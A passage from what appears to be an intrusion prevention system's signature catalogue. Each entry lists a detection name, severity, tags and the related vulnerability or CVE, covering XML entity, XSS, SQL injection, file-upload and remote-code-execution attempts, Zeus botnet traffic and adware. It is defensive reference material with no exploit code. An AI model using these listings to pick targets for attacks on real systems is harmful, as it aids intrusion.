Springsource-Spring-Framework-HttpMessageConverter-Xml-External-Entity
McAfee-Epolicy-Orchestrator-Xml-External-Entity
Adobe-BlazeDS-XML-External-Entity-Injection
Zimbra-Collaboration-Mailboxd-External-Entity-Vulnerability
Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102
Description:
Back to top

HTTP_CS-Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities

About this situation: An attempt to exploit an XML DTD detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft .NET Framework, Apache Santuario, Apache XML Security for Java, MS2013-10, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Apache-Santuario-Xml-Security-For-Java-Dtd-Denial-Of-Service
Microsoft-.NET-Framework-Xml-Signature-Validation-Entity-Expansion-DOS
Description:
Back to top

HTTP_CS-Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution

About this situation: Detects potential attempts to exploit an eval injection vulnerability in certain XML parsers
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-324-4219
Vulnerability: Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution
Description:
Back to top

HTTP_CS-XMLDsig-Hmac-Truncation-Authentication-Bypass

About this situation: A low length for ds:HMACOutputLength XMLDsig parameter detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Generic HTTP server, MS2010-06, CVE2009, Any Operating System not specific, Generic HTTP client not specific, Generic HTTP server not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-565-5211
Vulnerability: XMLDsig-Hmac-Truncation-Authentication-Bypass
Description:
Back to top

HTTP_CS-XSS-Post-To-SEO-Exploit-Kit

About this situation: Cross-Site Scripted connection to SEO Exploit Kit
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1618-5242
Description:
Back to top

HTTP_CS-Xunlei-Thunder-Network-Connect

About this situation: An attempt to connect to Xunlei Thunder network was detected
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Xunlei Thunder, Windows not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-184-2032
Last changed: sgpkg-ips-184-2032
Vulnerability: Xunlei-Thunder-Usage
Description:
Back to top

HTTP_CS-Xwiki-Filename-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1513-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Xwiki-Filename-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Xwiki-Upload-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Xwiki-Upload-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-YoungZSoft-CCProxy-Connect-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in YoungZSoft CCProxy was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, YoungZSoft CCProxy, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1590-5242
Vulnerability: YoungZSoft-CCProxy-Connect-Buffer-Overflow
Description:
Back to top

HTTP_CS-Ysoserial-Generated-DotNet-Serialized-Object-In-A-MSMQ-Message

About this situation: .NET serialized object with Ysoserial gadget chain characteristics detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2024, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1800-5242
Last changed: sgpkg-ips-1800-5242
Vulnerability: Ysoserial-Generated-DotNet-Serialized-Object
Citrix-Virtual-Apps-And-Desktops-Insecure-Deserialization-CVE-2024-8069
Description:
Back to top

HTTP_CS-Zabbix-Server-Setup.php-Authentication-Bypass-CVE-2022-23134

About this situation: An attempt to exploit a vulnerability in Zabbix detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Zabbix-Server-Setup.php-Authentication-Bypass-CVE-2022-23134
Description:
Back to top

HTTP_CS-Zeus-Configuration-File-Download

About this situation: Zeus configuration file download detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CS-Zeus-Post-Request-Detected

About this situation: Zeus Post request detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CS-Zeus-Zbot-Botnet-Configuration-Download

About this situation: Zeus/Zbot based botnet configuration download
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CS-Zeus-Zbot-Botnet-Possible-Configuration-Download

About this situation: Zeus/Zbot based botnet configuration download
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CS-Zeus-Zbot-Botnet-POST-Request-To-CnC

About this situation: Zeus/Zbot based botnet POST Request to CnC
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-430-4219
Last changed: sgpkg-ips-702-5211
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CS-Zimbra-Collaboration-Memcached-Command-Injection-In-Authorization-Header-CVE-2022-27924

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Zimbra-Collaboration-Memcached-Command-Injection-CVE-2022-27924
Description: CVE References: CVE-2022-27924
Back to top

HTTP_CS-Zivif-Camera-iptest.cgi-Blind-RCE

About this situation: An attempt to exploit a vulnerability in Zivif Cameras detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zivif Camera, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: Zivif-Camera-iptest.cgi-Blind-RCE
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Admanager-Plus-CVE-2021-37539-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADManager Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1413-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Zoho-Manageengine-Admanager-Plus-CVE-2021-37539-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Admanager-Plus-Licenseaction-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADManager Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Zoho-Manageengine-Admanager-Plus-Licenseaction-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Admanager-Plus-Modifyphotoaction-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADManager Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Vulnerability: Zoho-Manageengine-Admanager-Plus-Modifyphotoaction-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Admanager-Plus-Passwordexpiryaction-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADManager Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Zoho-Manageengine-Admanager-Plus-Passwordexpiryaction-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Admanager-Plus-ReportsAction-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in ManageEngine ADManager Plus detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADManager Plus, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Vulnerability: Zoho-Manageengine-Admanager-Plus-ReportsAction-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Applications-Manager-Uploadaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1279-5242
Last changed: sgpkg-ips-1279-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Uploadaction-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Multiple-Products-Importtechniciansaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ServiceDesk Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1413-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Importtechniciansaction-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Multiple-Products-URL-Monitoring-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-URL-Monitoring-SQL-Injection
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Network-Configuration-Manager-CVE-2021-41081-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Network Configuration Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Network Configuration Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Zoho-Manageengine-Network-Configuration-Manager-CVE-2021-41081-SQL-Injection
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Opmanager-Business-View-Background-Image-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1116-5242
Vulnerability: Zoho-Manageengine-Opmanager-Business-View-Background-Image-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Password-Manager-Pro-Autologonhelperutil-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Access Manager Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Access Manager Plus, Zoho Corporation ManageEngine PAM360, Zoho Corporation ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Zoho-Manageengine-Password-Manager-Pro-Autologonhelperutil-SQL-Injection
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Password-Manager-Pro-Queryreportcontroller-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Access Manager Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Access Manager Plus, Zoho Corporation ManageEngine PAM360, Zoho Corporation ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Zoho-Manageengine-Password-Manager-Pro-Queryreportcontroller-SQL-Injection
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Servicedesk-Plus-CVE-2021-37415-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ServiceDesk Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-CVE-2021-37415-Authentication-Bypass
Description:
Back to top

HTTP_CS-Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine ServiceDesk Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
Description:
Back to top

HTTP_CS-ZoneMinder-Language-Settings-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in ZoneMinder detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ZoneMinder, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Vulnerability: ZoneMinder-Language-Settings-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Zope-XMLTools-Plone-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Zope XMLTools using Plone detected
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Zope Plone, CVE2011, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: Zope-XMLTools-Plone-Remote-Command-Execution
Description:
Back to top

HTTP_CSC-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_CSH-2020search

About this situation: 2020Search traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, 2020Search, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: 2020search
Description:
Back to top

HTTP_CSH-2nd-Thought

About this situation: 2nd Thought traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, 2nd Thought, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: 2nd-Thought
Description:
Back to top

HTTP_CSH-427BB-Authentication-Bypass

About this situation: An attempt to exploit a 427BB Authentication Bypass vulnerability detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, 427BB, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-1279-5242
Vulnerability: 427BB-Authentication-Bypass
Description:
Back to top

HTTP_CSH-4Shared-Access

About this situation: Detects 4Shared access
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, 4Shared, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-408-4219
Vulnerability: 4Shared-File-Sharing-Service
Description:
Back to top

HTTP_CSH-ABetterInternet

About this situation: ABetterInternet browser plugin activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ABetterInternet, Windows not specific, ABetterInternet not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-615-5211
Vulnerability: ABetterInternet
Description:
Back to top

HTTP_CSH-Acnetsteal-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Android.Backdoor.Acnetsteal-Botnet
Description:
Back to top

HTTP_CSH-Actualscripts-Actualanalyzer-Cookie-Command-Execution

About this situation: An attempt to exploit a vulnerability in ActualScripts ActualAnalyzer Lite detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ActualScripts ActualAnalyzer Lite, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1733-5242
Vulnerability: Actualscripts-Actualanalyzer-Cookie-Command-Execution
Description:
Back to top

HTTP_CSH-Acunetix-Vulnerability-Scanner-Usage

About this situation: Detects vulnerability scanner usage
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-481-5211
Last changed: sgpkg-ips-481-5211
Vulnerability: Acunetix-Vulnerability-Scanner-Usage
Description:
Back to top

HTTP_CSH-Adload-Command-And-Control-Traffic

About this situation: AdLoad command and control traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Mac OS, Any Hardware, Mac OS not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1622-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Adload-Command-And-Control-Traffic
Description:
Back to top

HTTP_CSH-Adobe-ColdFusion-Improper-Access-Control-File-Read-CVE-2024-20767

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Vulnerability: Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767
Description:
Back to top

HTTP_CSH-Adobe-Flash-Player-Usage

About this situation: Adobe Flash Player usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-273-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Adsincontext

About this situation: AdsInContext traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, AdsInContext, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adsincontext
Description:
Back to top

HTTP_CSH-Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal
Description:
Back to top

HTTP_CSH-Adware-180sa

About this situation: Adware 180SA activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, 180SA, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-180sa
Description:
Back to top

HTTP_CSH-Adware-Adroar

About this situation: Adware Adroar activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Adroar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Adroar
Description:
Back to top

HTTP_CSH-Adware-Adtomi

About this situation: Adware Adtomi traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Adtomi, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Adtomi
Description:
Back to top

HTTP_CSH-Adware-Bdsearch

About this situation: Possible adware BDSearch traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, BDSearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Bdsearch
Description:
Back to top

HTTP_CSH-Adware-Casclient

About this situation: Possible adware CasClient traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, CasClient, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Casclient
Description:
Back to top

HTTP_CSH-Adware-Commonname

About this situation: Adware CommonName traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, CommonName, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Commonname
Description:
Back to top

HTTP_CSH-Adware-Exactsearch

About this situation: Adware Exactsearch traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Exactsearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Exactsearch
Description:
Back to top

HTTP_CSH-Adware-Ilookup

About this situation: Adware ILookup traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ILookup, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Ilookup
Description:
Back to top

HTTP_CSH-Adware-mysearch

About this situation: Adware MySearch traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MySearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-mysearch
Description:
Back to top

HTTP_CSH-Adware-Pornkings

About this situation: Adware PornKings activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, PornKings, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Pornkings
Description:
Back to top

HTTP_CSH-Adware-Rapidblaster

About this situation: Adware RapidBlaster traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, RapidBlaster, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Rapidblaster
Description:
Back to top

HTTP_CSH-Adware-Searchaid

About this situation: Adware SearchAid traffic detected.
Context: HTTP Request Header Line
Severity: 7
